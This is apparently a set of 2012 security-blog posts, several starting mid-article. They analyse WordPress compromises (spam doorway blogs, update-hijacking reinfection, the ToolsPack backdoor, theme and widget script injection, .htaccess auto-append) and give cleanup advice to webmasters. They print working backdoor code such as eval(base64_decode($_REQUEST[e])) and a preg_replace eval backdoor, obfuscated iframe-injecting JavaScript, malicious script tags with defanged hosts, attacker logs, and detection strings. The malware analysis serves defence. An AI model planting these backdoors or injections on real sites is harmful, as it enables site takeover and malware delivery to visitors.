During the last few years I saw many attacks where cyber criminals created large spammy sites in subdirectories of hacked legitimate sites. It’s an easy way to create millions of doorway pages on thousands of established domains with good reputation for free (owners of hacked sites pay for hosting, bandwidth and domains) — typical parasitic behavior. Webmasters normally only visit pages they created themselves and rarely check what happens in subdirectories so they may not notice spammy sections for months. Sometimes such sections may be significantly larger than legitimate sections of hacked websites and attract much more search traffic.

The back end of such rogue sections is usually some doorway generating script along with rewrite rules in .htaccess or a simple blogging engine like FlatPress that doesn’t require a database. The only requirement of such solutions is PHP so they will work on most websites.

However this time spammers chose WordPress as a back end for their doorways. After all, if they hack a WordPress blog, the server is guranteed to be compatible with WordPress and all they need to do to install a new instance is get MySQL password from existing wp-config.php and chose a different table prefix for their WordPress database.

Here’s how the attack works

Step 1. Get admin passwords for WordPress or Joomla.

Most likely they use brute force attacks to guess the password.

Step 2. Inject a backdoor

(Further, I will use WordPress for my examples as I know it better than Joomla and there are more hacked WP blogs than Joomla sites.)

Using the stolen credentials, log into WordPress admin interface and use the Theme Editor to inject a web shell into some existing plugin (usually Akismet).

Step 3. Create a subdirectory

Using the web shell, create a subdirectory for a new doorway blog. Typical names of such subdirectories are:

• /wp-content/upgrade/2012/
• /wp-content/upgrade/new/
• /wp-content/upgrade/css/
• /wp-content/upgrade/luxury
• /wp-content/themes/2012/
• /wp-content/themes/new/
• /wp-content/themes/slimming/
• /wp-content/themes/luxury
• /wp-content/plugins/css/
• /wp-content/plugins/slimming/
• /wp-content/plugins/luxury/
• /wp-content/uploads/css/
• /wp-content/uploads/php/2012/
• /wp-content/uploads/php/luxury/
• /wp-content/uploads/php/new/
• /wp-content/uploads/slimming
• /wp-content/slimming/
• /media/2012/
• /media/css/
• /php/2012/
• /php/new/
• /php/luxury
• /modules/css/
• /api/luxury/
• /include/luxury/
• /includes/css

As you can see, the names of subdirectories suggest that there shouldn’t be any web pages there.

Step 4. Upload WordPress installation package

Upload a WordPress installation package into that subdirectory and upzip it. (I found an unzip.php/un.php/ u.php web unzip utility with Chinese interface in those subdirectories of many hacked sites)

Step 5. Get MySQL credentials and install WordPress

Get MySQL database credentials from wp-config.php of the hacked WP blog or from configuration.php in case of Joomla. Enter these credentials into wp-config.php of the doorway blog. Choose some unique table prefix for the database of a doorway blog. And then complete the blog installation process by opening it’s “wp-admin/install.php” script.

Step 6. Doorway theme

Install a new WordPress theme that mimics interface of the online store that this particular doorway works with.

When you click on any item, you get redirected to the corresponding section of the promoted website.

Text of blog posts can be found two screens below the fold – it’s only for search engines.

Step 7. Enable remote publishing

Log into the new doorway blog and enable remote publishing. This option allows spammers to use automated tools to post new articles via XML-RPC protocol.

Step 8. Post spammy articles

Here’s an excerpt from a log file that shows how they post using XML-RPC

218.29.97.165 - - [13/Apr/2012:20:19:18 +0200] "POST /wp-content/upgrade/new/wp-login.php HTTP/1.1" 302 - "http://DOMAIN-REMOVED/wp-content/upgrade/new/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"
218.29.97.165 - - [13/Apr/2012:20:20:54 +0200] "POST /wp-content/upgrade/new/xmlrpc.php HTTP/1.1" 200 501 "-" "Apache XML RPC 3.1.3 (Sun HTTP Transport)"
218.29.97.165 - - [13/Apr/2012:20:21:25 +0200] "POST /wp-content/upgrade/new/xmlrpc.php HTTP/1.1" 200 4300 "-" "Apache XML RPC 3.1.3 (Sun HTTP Transport)"
218.29.97.165 - - [13/Apr/2012:20:25:21 +0200] "POST /wp-content/upgrade/2012/xmlrpc.php HTTP/1.1" 200 4324 "-" "Apache XML RPC 3.1.3 (Sun HTTP Transport)"
218.29.97.165 - - [13/Apr/2012:20:35:31 +0200] "POST /wp-content/upgrade/new/xmlrpc.php HTTP/1.1" 200 893 "-" "Apache XML RPC 3.1.3 (Sun HTTP Transport)"

Black hat SEO scheme

With various modification, this particular campaign has been active for at least a year now. However, most of the “slimming” blogs that I described here were created in March 2012.

At this point I found such doorway blogs on about 3,000 hacked sites with unique domain names. There are usually 1-4 different doorway blogs on each domain – each blog promotes different online store.

Here’s an incomplete list of the promoted sites:

• slimming-capsules .com
• slimming2012 .com
• 361slim .com
• botanicalslimworld .com
• discount-luxury-sotre .com
• cheap-luxury-shop .com
• 0bags .com
• cheap-luxury-store .info
• brandhandbagsonline .com

Each blog (created in March) has 200-500 posts, which means about a million of doorway pages targeted for all sorts of keyword combinations on “diet pills” and “luxury” topics.

The posts are a keyword-rich gibberish with cross-links to doorway blogs on other domains.

Their only purpose is to get indexed by search engines so that doorways rank well for targeted keywords. Apperently, this works quite well. I can see many doorways on first pages of Google search results for most searches I checked (three words or more). E.g. [buy meizitang in dallas], [botanical slimming capsule australia], [Givenchy Outlet in Abu Dhabi UAE], [buy cheap Fendi Boston]

A few days ago I reported those blogs to Google and they have already removed many of them from their index. I hope Google will figure out a way to detect such blogs itself and won’t index doorways in the first place leaving spammers less incentive to hack legitimate sites.

Chinese trace

Unlike black hat SEO campaigns that I blogged about before, this one has strong Chinese traces. It promotes sites that sell Chinese goods and belong to Chinese. For example all “slimming” and “fake luxury” sites feature the same Western Union payment recipient:

Moreover, doorways use a counter script of the Chinese 51.la service. Unzip scripts found on hacked sites have Chinese user interface. And IP addresses of people who logged into WordPress admin interface of the doorway blogs are also Chinese (e.g. 218.29.97.165).

Phishing

It is also worth noting that not only do cyber criminals use those hacked site for black hat SEO, but they also place phishing files there.

For example, this HSBC phishing form was found under wp-content/plugins/akismet/ (in subdirectories with names like 0nl, ama, atu, b4t, etc.)

The phishing files are:

• index.php – generates an authentic looking query string and redirects to hsbcstart.php
• hsbcstart.php – mimics a login screen and asks to enter your user ID. Then redirects to continue.php
• continue.php – asks for your personal and account details (including credit card number and its PIN code)
• last.php – this script sends the entered details to the following emails: newforuk@gmail.com and halisanta1@gmail.com and then redirects to a real HSBC home page.

If you ever considered buying something from online stores that sell some fake stuff, generic pills or pirated software — think again. Now you know that you are buying from the same people who try to steal your banking details. All their assurance that “safety of your personal information is extremely important to them” along with fake “Better Business Bureau” and fake security seals are just tricks to make feel unalert while being robbed.

To webmasters

Your site, no matter how big or small it is, is a valuable resource for cyber criminals. As you can see, they can host doorways and phishing pages there. And these are only two of many more site abuse scenarios. Be prepared to protect your site and regularly check it for security issues.

• Choose strong passwords for your web applications (blogs, CMS, forums, etc) and don’t use default names such as “admin” for application administrators.
• Monitor changes in your server file system. Hackers like deep subdirectories because many webmasters never check what happens there.
• Regularly check output of the Google’s [ site:your-domain-here.com ] searches. You might find that Google has indexed pages that should not belong to your site.
• You will also find very useful reports in the Traffic section of Google Webmaster Tools. Unlike Google Analytics, Webmaster Tools provide reports for all site pages, not only pages with your tracking code, which is important since hackers won’t install you GA tracking code in their doorways.
  • Search Queries – you can spot queries irrelevant to you site.
  • Links to Your Site – you can find suspicious incoming links here.
  • Internal Links – this report can help reveal rogue sections of your site.
• Don’t forget about raw access logs — they are you best friends if things go bad. Even if you don’t know how to work with logs, you can find a professional that will be able to use them to identify malicious files and security holes on your server so that you can properly clean up and harden it. Log analysis can also help reveal “alien” sections and pages on your site.
  On many shared hosts, access logs are disabled, so it’s a good idea to check if they are enabled for your site now. (In case of cPanel you will find this setting under Logs->Raw Access Logs)

##
Your comments and additional information are welcome.

Related posts:

• More About the Rogue Image Blogs on Servage Network…
• Weak Passwords and Tainted WordPress Widgets
• Bety.php Hack. Part 2. Black Hats in Action
• Hacked WordPress Blogs Poison Google Images
• Introduction to Website Parasites

Sometimes I see how webmasters misinterpret the importance of upgrades for WordPress security. They expect that if they upgrade a hacked blog, it will immediately become clean and secure. Unfortunately it doesn’t work this way. Upgrades can only clean core WordPress files, leaving backdoors, infected themes, plugins and database records intact. That’s why it is important to clean up your site before the upgrade.

Moreover, a few days ago I came across a new massive infection (more than 1,000 currently known infected blogs) that hijacks the “Automatic Update” feature and makes it the event that triggers blog re-infection.

This attack began just before the WordPress 3.3.2 release, and many blogs now actively use the “Automatic Update” option to upgrade their blogs to this new version. For some of them, the upgrades come with a malicious extra.

Here’s a typical message on Safe Browsing diagnostic of infected site:

Malicious software is hosted on 8 domain(s), including riotorio .com/, vet46.osa .pl/, vetb3.osa .pl/.

5 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including berega .in/, bingotobingo .com/, cheap-royal-canadian-pill .com/.

Infected sites redirect search traffic to

hxxp://berega .in/?site=<site id>&q=<search query>&searchEngine=<engine id>
hxxp://zizigoba .in/?site=<site id>&q=<search query>&searchEngine=<engine id>
hxxp://vivizaza .be/?site=<site id>8&q=<search query>&searchEngine=<engine id>

and then to sites like

hxxp://riotorio .com/search/?q=<search query>
hxxp://lazgosearch .com/search?_t=1&q=<search query>
http://gabazasearch .com/?_t=1&q=<search query>

Then via several layers of affiliate and pay-per-click redirectors (that include 184.171.169.132/click.php, clicks.thespecialsearch.com, ck.ads.affinity.com, ad.zanox.com/ppc/) you end up on various e-commerce sites or low quality PPC search result aggregators.

Here’s how this attack works:

wp-settings.php

In wp-settings.php file, there is the following injected code:

// For an advanced caching plugin to use. Uses a static drop-in because you would only want one.
// Start cache settings
eval(base64_decode('...long unreadable string here...'));
// Finish cache settings
// Start cache settings
// Finish cache settings

This code is responsible for malicious redirects. You can find unencrypted code here: http://pastebin.com/mPePkZ8R

If you read PHP, you’ll notice three interesting things in the code:

1. It sets a cookie “_tr” and only redirects if your browser doesn’t have this cookie (first time visitor from a search engine) – that’s why it may be hard to reproduce the redirects.

2. It works in two modes (depending on server capabilities): In mode “2″ it just modifies the “Location” HTTP header to redirect a visitor to a third party site.
In mode “1″, it makes a request to a remove server and then returns the response of that remove server. This remote server can save your IP address and you won’t be able to reproduce redirects even if you remove all cookies.

3. At the top of the code you can see this strange block:

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) {
$c = $_POST['cadv'];
$c = str_replace("\\\\", "\\", $c);
$g = $_POST['gadv'];
$g = str_replace("\\\"", "\"", $g);
$r = preg_replace("$c", $g, 'sss 4');
die();
}

It adds a backdoor functionality to this malicious code. Using specially crafted cadv and gadv paramers of POST requests and the PHP PREG_REPLACE_EVAL modifier in the preg_replace function, it is possible to execute arbitrary PHP code on compromised servers.

Update.php

Another changed file is wp-admin/includes/update.php where hackers modified the “wp_update_core” function:

// Start cache settings
$ee = $upgrader->upgrade($current);
define('WPA_SILENCE', '1');
eval(base64_decode("...long unreadable string here..."));
return $ee;
// Finish cache settings

instead of the original

return $upgrader->upgrade($current);

line.

The decoded version can be found on Pastebin: http://pastebin.com/v7SvS4yW

What this encrypted piece of code does is inject the malicious code into wp-settings.php file preserving its modification date.

Hijacked Automatic Updates

But why is it in wp-admin/includes/update.php? Is it just a random file that hackers use for this reinfection code? Of course not. This file and specifically the “wp_update_core” function is used by the WordPress Automatic Update feature.

Behind the scenes, the “wp_update_core” function checks for available updates, downloads new files, replaces old files and does all the rest stuff required to successfully complete WordPress upgrades. Your blog is supposed to be fully updated just before this function returns. At that moment all infected core WordPress files (such as wp-settings.php) should be replaced with new clean copies. And this is exactly the moment when the malicious code in the “wp_update_core” function begins to work. It reinfects the just-updated and new wp-settings.php file.

So if you thought that WordPress upgrade could only make you blog more clean – you were wrong. If your blog was infected before the upgrade and hasn’t been completely cleaned up, the upgrade itself may even reinfect files that were clean before the upgrade.

Summary

1. WordPress upgrades are not a silver bullet. They can only improve your blog security if it was 100% clean before the upgrade. Otherwise you still have to invest your time in resolving all current security issues.

2. WordPress developers should consider adding some integrity control into their system (e.g. checksum control for core WP files) and warn webmasters (blog administrators) if core files change.

3. This particular attack hijacks only automatic WP upgrades. Manual upgrades and upgrades via SVN are still completely safe. By the way, not only are SVN updates safe but they are also nearly as simple as automatic updates (one simple command) and provide built-in integrity control, so you can easily identify all changed and potentially infected code WordPress files and have them reverted to their original state.

Update (May 4, 2012): I can see that some bloggers misinterpret my article and conclude that the Automatic Update feature of WordPress is not safe. That’s not correct. The Automatic Update feature itself is completely safe if your WordPress blog is not compromised. But when your blog is already hacked, hackers can hijack any feature and add malicious functionality to it. In this particular case, they decided to modify the auto-update feature to restore malicious code in wp-settings.php.

Request for information

If your blog is affected by this particular attack and you have raw access logs for at least one week, please contact me. Your logs can help me learn more about this attack: what was the original security hole, how hackers use the backdoor, etc.

Your comments are welcome too.

Related posts:

• Weak Passwords and Tainted WordPress Widgets
• You Need to Pay For This Crypt. Trial Version of Malware?
• /tmp/wp_inc or Not Your Typical WordPress Attack
• Introduction to Website Parasites

if(window.document)try{location(1 2);} catch(qqq){zz='eva l'; ss=[]; aa=[]+0;aaa=0+[]; if(aa.indexOf(aaa)===0){f='fro'+'m'+'C'+'h'+'ar';f+='Code';} ee='e...skipped...5a3.5a3.5a61.5".split("a");for(i=0;-n.length<-i;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));} if(1)q =ss; if(zz)e (q);

that injected an invisible iframe

<ifr ame src='hxxp://tds22 .assexyas .com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></ifra me>

What was really unusual was the the following text right after the closing </script> tag: “you need to pay for this crypt“. On some sites it was just that. On other sites it could be several consecutive duplicates of the phrase: “you need to pay for this cryptyou need to pay for this cryptyou need to pay for this cryptyou need to pay for this crypt”

How can you explain this message?

My guess is hackers used a trial version of a JavaScript encryption software to generate their obfuscated malicious scripts. When the trial period came to an end, the encryption software began to add the “you need to pay for this crypt” message after the generated scripts. Since the attackers use automated tools to generate scripts and infect websites, they simply didn’t notice that the injected piece of code contained a little extra that was actually visible on web pages (since it was outside of the <script> block). That’s why we can see the message right after the end of the malicious scripts.

So what about the duplicated messages? It can be easily explained. This attack updates the injected scripts every day. This helps prevent easy detection and automated removal. The iframe scr also changes every day to avoid blacklisting (e.g. today they use tds13 .findhere .org). The script that updates the injected code scans for the <script>…</script> block with a known content and replaces it with a new version of the malicious code. So the previous “you need to pay for this crypt” message remains intact and the new copy of the injected code contains the same nag message, which results in: “…</scripts>you need to pay for this cryptyou need to pay for this crypt“. And with every update this message becomes longer and longer.

A little variation of this hypothesis is it was a trial version of a whole exploitation kit rather than just of a JavaScript encryption module.

Is this plausible? Any other explanations? Let me know what you think about it.

Prevalence

Google reports 6148 infected sites. In my experience the real number of infected sites should be bigger.

At the same time, the “you need to pay for this crypt” provides us with an alternative way to estimate the prevalence of the infection. The ["you need to pay for this crypt"] Google search returns 74,800 results (not all of them are infected pages though) and the more specific ["you need to pay for this cryptyou need to pay"] search returns 34,700 results.

Nag message is gone

At this moment the injected malicious script no longer contain the nag message. Moreover, this message has disappeared from the compromised sites. So it looks the attackers:

1. noticed the problem
2. got rid of the nag message (either paid for the software or hacked it)
3. updated their injection scripts to remove remnants of the nag messages when they updated the malicious code.

Mostly WordPress

I checked many infected sites and most of them were WordPress blogs. And when the sites were not WordPress blogs, I suspect that they shared the same hosting account with WordPress sites — it’s enough to have one compromised site to infect all other sites under the same account.

The malicious code is injected at the very top of the index.php files in site root directories and sometimes in the first level of subdirectories (e.g. wp-content and wp-admin). This affects all sites under the same account.

ToolsPack

On WordPress blogs the typical name of the doorway file is ToolsPack.php. It pretends to be a WordPress plugin and can be usually located in the wp-content/plugins/ToolsPack/ directory. Here’s the content of the file:

<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>

In the latest versions I usually see a more simple code:

<?php
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>

As you can see, this “plugin” copies description of a legitimate and popular JetPack plugin, but provides only one line of code, which seems to be too little to supercharge WP with powerful features. Actually, this single line of code is indeed very powerfull as it allows the attackers to execute whatever PHP code they pass in the “e” parameter of requests to this file — typical backdoor.

Here are some real world log entries that show how this backdoor is used to reinfect sites:

83.69.224.227 - - [06/Mar/2012:03:17:41 -0500] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.0" 200 1 "-" "Mozilla/4.76 [en] (Win98; U)"
83.69.224.227 - - [06/Mar/2012:06:17:41 -0500] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.0" 200 1 "-" "Mozilla/4.76 [en] (Win98; U)"
83.69.224.227 - - [06/Mar/2012:08:21:50 -0500] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.0" 200 1 "-" "Mozilla/4.76 [en] (Win98; U)"
83.69.224.227 - - [06/Mar/2012:09:17:41 -0500] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.0" 200 1 "-" "Mozilla/4.76 [en] (Win98; U)"
83.69.224.227 - - [06/Mar/2012:10:18:45 -0500] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.0" 200 1 "-" "Mozilla/4.76 [en] (Win98; U)"

BTW, checkWPTools .com is not even registered at the moment.

On some sites, I found the whole ToolsPack “plugin” archive in /wp-content/uploads/ToolsPack.zip. I also found the same backdoor in a file named wpupload.php.

To Webmasters

It’s not yet clear how the backdoor was uploaded to those sites in the first place, but log analysis reveals many ongoing attempts to exploit vulnerabilities in TimThumb.php and 1-flash-gallery. So make sure to upgrade all themes and plugins that use the TimThumb library (or update the timthumb.php/thumb.php files yourself – you can find the latest version here)

I also highly recommend to scan your local computers for malware (after all, most likely you opened infected web pages) and change passwords.

Also make sure your browser is up-to-date:

• https://browsercheck.qualys.com/
• http://www.mozilla.org/en-US/plugincheck/

##
Your comments and any additional information are welcome!

Related posts:

• Script Injection (*.ddns.name) and Backdoors
• Weak Passwords and Tainted WordPress Widgets
• /tmp/wp_inc or Not Your Typical WordPress Attack
• Introduction to Website Parasites

<sc ript src="hxxp://www .copytech .lu/js/java.js"></script>

The script was at the very top of the HTML code and in the middle of the page. It was a WordPress site so I suggested to check the index.php and theme files for the malicious code.

The topmost script was indeed in the theme’s index.php file. But theme files didn’t contain the script that I found in the middle of web pages’ HTML code.

Sidebar Widgets

When I compared the code of the theme and the HTML of web pages, it became clear that the script was a part of a sidebar widget (stored in a database). I asked the webmaster to check code of theme widgets in WordPress admin interface (Appearance -> Widgets) — the malicious script was found at the bottom of one widget.

This sort of WordPress widget injection is quite uncommon, so I needed to figure out how the attackers managed to inject the malicious code into WordPress database.

Initially, I had two hypotheses:

• The attackers logged into WordPress admin interface and modified the widget code (but where did they get the credentials?)
• They used a backdoor script (web shell) to get the database password (from wp-config.php) and then used SQL commands to inject the code directly to a database (standard feature of many web shells)

I asked the webmaster to change passwords of all WordPress users to prevent attacks via the first scenario and requested to provide site’s access logs so that I could try to find suspicious requests [to backdoors].

Log Analysis

The logs analysis revealed a few interesting things:

1. I found a few unsuccessful attempts to exploit known vulnerabilities in WordPress plugins (e.g. timthumb.php/cropper.php, 1-flash-gallery) but there were no successful requests to anything that looked like a backdoor. — So, it looks like the backdoor scenario was incorrect.

2. Multiple POST requests to /wp-login.php from various IPs from all around the world. Many of them were consecutive. Some IPs requested this URL hundreds of times in a short period. — This looks like a distributed brute-force attack — someone tried to guess WordPress login/password.

3. And finally, I found a session that seems to be the answer:

Someone from Brazil (IP 201.0.108.40), logged into WordPress (on the first attempt)

201.0.108.40 - - [16/Feb/2012:14:51:11 -0700] "GET <removed>.com/wp-login.php HTTP/1.1" 200 2256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
...
201.0.108.40 - - [16/Feb/2012:14:51:16 -0700] "POST <removed>.com/wp-login.php HTTP/1.1" 302 - "http://<removed>.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
...
201.0.108.40 - - [16/Feb/2012:14:51:16 -0700] "GET <removed>.com/wp-admin/index.php HTTP/1.1" 200 44602 "http://<removed>.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

then used a theme editor to modify the index.php file in the current theme

201.0.108.40 - - [16/Feb/2012:14:51:37 -0700] "GET <removed>.com/wp-admin/theme-editor.php?file=/themes/current-theme/index.php&theme=Current+Theme&dir=theme HTTP/1.1" 200 34802 "http://<removed>.com/wp-admin/theme-editor.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
201.0.108.40 - - [16/Feb/2012:14:51:48 -0700] "POST <removed>.com/wp-admin/theme-editor.php HTTP/1.1" 302 - "http://<removed>.com/wp-admin/theme-editor.php?file=/themes/current-theme/index.php&theme=Current+Theme&dir=theme" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
201.0.108.40 - - [16/Feb/2012:14:51:49 -0700] "GET <removed>.com/wp-admin/theme-editor.php?file=/home/<removed>/html/wp-content/themes/<current-theme>/index.php&theme=Current+Theme&a=te&scrollto=0 HTTP/1.1" 200 35009 "http://<removed>.com/wp-admin/theme-editor.php?file=/themes/current-theme/index.php&theme=Current+Theme&dir=theme" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

and then modified some widget in that theme

201.0.108.40 - - [16/Feb/2012:14:52:16 -0700] "GET <removed>.com/wp-admin/widgets.php HTTP/1.1" 200 88903 "http://<removed>.com/wp-admin/theme-editor.php?file=/home/<removed>/html/wp-content/themes/current-theme/index.php&theme=News+Magazine+Theme+640&a=te&scrollto=0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
...
201.0.108.40 - - [16/Feb/2012:14:52:33 -0700] "POST <removed>.com/wp-admin/admin-ajax.php HTTP/1.1" 200 1692 "http://<removed>.com/wp-admin/widgets.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"


It all took less than two minutes. So that visitor definitely knew the WordPress admin password (only administrators can edit themes) and was only interested in modifying the index.php and some widget — the places where the malicious code was found later. And these were the only two minutes that the IP 201.0.108.40 worked with the site (at least during the two weeks that I had access logs for).

By the way, the webmaster told me that a few WordPress users, including the user with an administrative role, used “123456” as their passwords — no wonder the attackers managed to figure out the passwords.

That’s probably the first time I come across a massive attack that tries to guess WordPress admin credentials and then use them to modify current themes.

Most probable scenario

Hackers use brute force attacks to guess logins/passwords of WordPress blogs (I saw signs of similar attacks in access logs of some other sites too).

Once they find a working combination, they log into the compromised blogs and use a theme editor to inject a malicious code into theme files (usually index.php) and then use a widget editor to inject the same malicious code into “text” widgets (that allow raw HTML code).

Other sites involved in the attack

Then I checked a few other affected sites (the “copytech .lu” scripts) and they all were WordPress blogs with scripts injected at the very top of the HTML code and in the widget sections (if blogs used widgets). Moreover, I found a few other malicious scripts injected by this attack. e.g.

<sc ript src="hxxp://halldor .is/_inf/G3.js"></script>

Here are some typical messages that you can find on Safe Browsing diagnostic pages of the affected sites:

Malicious software is hosted on 3 domain(s), including halo8.com/, fafonseca.com.br/, copytech.lu/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including copytech.lu/, clasingsky.com/.

and

Malicious software is hosted on 1 domain(s), including infcom.it/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including halldor.is/, gesotim.org/.

The malicious scripts are usually intermediaries that simply load other malicious scripts from different sites. For example:

• hxxp://gesotim .org/_inf/index.php?action=iframe
• hxxp://www.clasingsky .com/img/_inf/index.php?action=iframe

It’s easy to notice that all those malicious scripts are loaded from compromised legitimate websites. Hackers use this trick more and more. They place their malicious files in subdirectories of hacked web sites. So it’s always a good idea to regularly scan your servers for unwanted files.

Webmasters

The only principle of website security that knows literally every webmaster and site owner is to use passwords that other people don’t know and can’t easily guess. However, this attack shows that many bloggers still don’t bother using strong passwords.

I’d like to use this chance to remind some password management best practices:

1. Use strong passwords (not “123456″, not “qwerty”, not some common word or names) — attackers use automated tools to try hundreds (if not thousands) new combinations every day. Here are a couple of approaches to choosing strong passwords:
   • YouTube: How to choose a strong password – simple tips for better security by Graham Cluley
   • xkcd:Password Strength
2. Regularly change passwords
3. Don’t use the same passwords for different services and on different sites.
4. Use password managers like KeePass or LastPass so that you don’t have to memorize every password (you still need to remember a master password and it should be strong).
5. Don’t use easy to guess user names. It’s another layer of your security, so “admin” and “administrator” are the worst possible user names for site administrators.
   For WordPress users: Your WordPress administrator’s user name should NOT be admin – it’s too easy to guess. If you still have the “admin” user, create a new administrator user with a different login and then remove the “admin” user.

That’s the bare minimum that every webmaster should know about passwords.

##
Your comments are welcome!

Similar posts:

• 10 FTP Clients Malware Steals Credentials From
• Beware: FileZilla Doesn’t Protect Your Passwords
• Hackers target unpatched WooFramework
• Introduction to Website Parasites

Shortly after that I was contacted by foks, who shared some interesting information. He conducted his own investigation and found out how hackers injected those scripts into legitimate web pages. He also found a new (buggy) version of the malicious script.

Attack via FTP

Foks confirms that the attackers used FTP to downloads .html and .php files that contained ‘index‘, ‘main‘ or ‘default‘ in their file names. Then they injected the malicious script and uploaded modified files back to server.

Auto-appended google_verify.php

But that’s not all. On some sites they uploaded a new “google_verify.php” file into root directories (and sometimes into subdirectories). The only content of that google_verify.php file is the same malicious JavaScript.

Then they created/modified .htaccess files in directories with google_verify.php and added the following directives:

<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>

<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>

What these directives do is automatically append the content of the google_verify.php to every php web page. This means that your legitimate .php files will remain unmodified but you still will be seeing the malicious script when you check the HTML code of generated web pages.

As I wrote in my previous article, I’ve been watching as this attack evolves and mutates for more than two years now. I don’t usually have access to compromised sites so I didn’t notice this auto-append trick before. Now a short google search session revealed that this trick was in use at least since summer of 2011. 1, 2, 3.

It should be mentioned that every FTP attack came from different IP addresses. Most likely the attackers use their botnet to infect new websites. This corresponds to their approach to hide their central infrastructure behind the fast flux network of infected computers.

New buggy script

Foks also brought my attention to an alternative version of the malicious script. With minimal modifications, it looks almost the same as the original script: the same “lorem ipsum” comments, the same code structure and variable names. But this new script didn’t fetch Twitter trends and didn’t try to load any malware.

So I looked at the script and tried to decode it. Apparently, the decoded version was a verbatim copy of the original decoded script with one small exception — one incorrect character which broke the whole script.

original: window.gloa=(function()...
new:      wÍndow.gloa=(function()...

The source of this error seems quite interesting. Let’s take a look at the encoded scripts. They both have long arrays of numbers that will be later converted to JavaScript code. Both arrays are identical except for the first four items:

original: [89,75,80,70,81,89,16,73,78,81,67,...
new: ["L",189-20*cid,175,16*cid,70,81,89,16,73,78,81,67,...

Note, if cid==5, then the first three numeric items of the second array will be: 89, 175, 80, which matches the first three item of the first array. The only difference is the 75/175 pair. If you replace 175 with 75 in the second script, you will get a perfectly working code.

Apperently, the attackers manually modified the original script (probably to prevent detection by anti-malware scanners) and forgot to add something like -20*cid to that 175. What even more lame, they failed to test the new script.

According to foks, the attackers switched to this buggy script around January 23rd and 3 weeks later they still use it. How come they don’t see it doesn’t work? I even began to worry whether that really was a bug, or this could be some little known feature of some browser’s JS engine that they tried to exploit. If you know the answer to this question, please let me know here or on the Stack Overflow.

Meanwhile, (as of February 18th, 2012) the domain name generating algorithm described in my previous article still in use and my online demo still correctly predicts new malicious domains. Of course, because of the bug in the new version of the script, only websites infected in the beginning of January still actually load malware from domains generated by this algorithm. And this fact is reflected in Google Safe Browsing diagnostic pages that show quite few infected websites now.

To Webmasters

Clean up

1. Scan your server for .html and .php files (usually ‘index‘, ‘default‘, ‘main‘) that contain the malicious code. Examples of the malicious code:
   • http://pastebin.com/36NC4Ugy
   • http://pastebin.com/j8PNeSHC
   • http://pastebin.com/zQWepqtz
2. Remove the the malicious code from your files.
3. Scan server for google_verify.php files that contain the above malicious code. Delete them.
4. In the directories with google_verify.php, check .htaccess files. If you find php_value auto_append_file “google_verify.php” instructions there — remove them.
5. There might also be uploaded backdoor files and web shells. Scan your server for suspicious files that contain the following strings (the list is not complete):
   • FilesMan
   • eval(base64_decode
   • eval(gzinflate(base64_decode

Prevent reinfections

The most common way to steal FTP passwords is via malware on computers of webmasters.

1. Scan all computers that have access to your websites for malware. Your anti-virus software should be up-to-date. Consider deep scans or even “scan on reboot” if your anti-virus provides such options.
2. Change all site passwords. Don’t save new passwords in FTP programs. Configure them so that they ask for a password every time you connect to your sites. If you work with multiple sites and don’t like the idea of memorizing many passwords, consider using password managers like KeePass — they save your passwords much more securely.
3. Consider using SFTP instead of FTP that transfers your passwords in plain text. Most popular FTP programs support SFTP, so the switch should be painless.
4. Now you know that even benign sites as yours can be dangerous to visit. Don’t give malware a chance to infect your computer. Make sure your OS, web browser and browser plugins are up-to-date. You can scan your browser and browser plugins here:
   1. Mozilla Plugin Check & Updates
   2. Qualys BrowserCheck
   3. (new versions of Chrome check plugins by default)

Similar posts:

• Lorem Ipsum and Twitter Trends in Malware
• 10 FTP Clients Malware Steals Credentials From
• Hackers Use Twitter API To Trigger Malicious Scripts
• Twitter API Still Attracts Hackers
• Introduction to Website Parasites

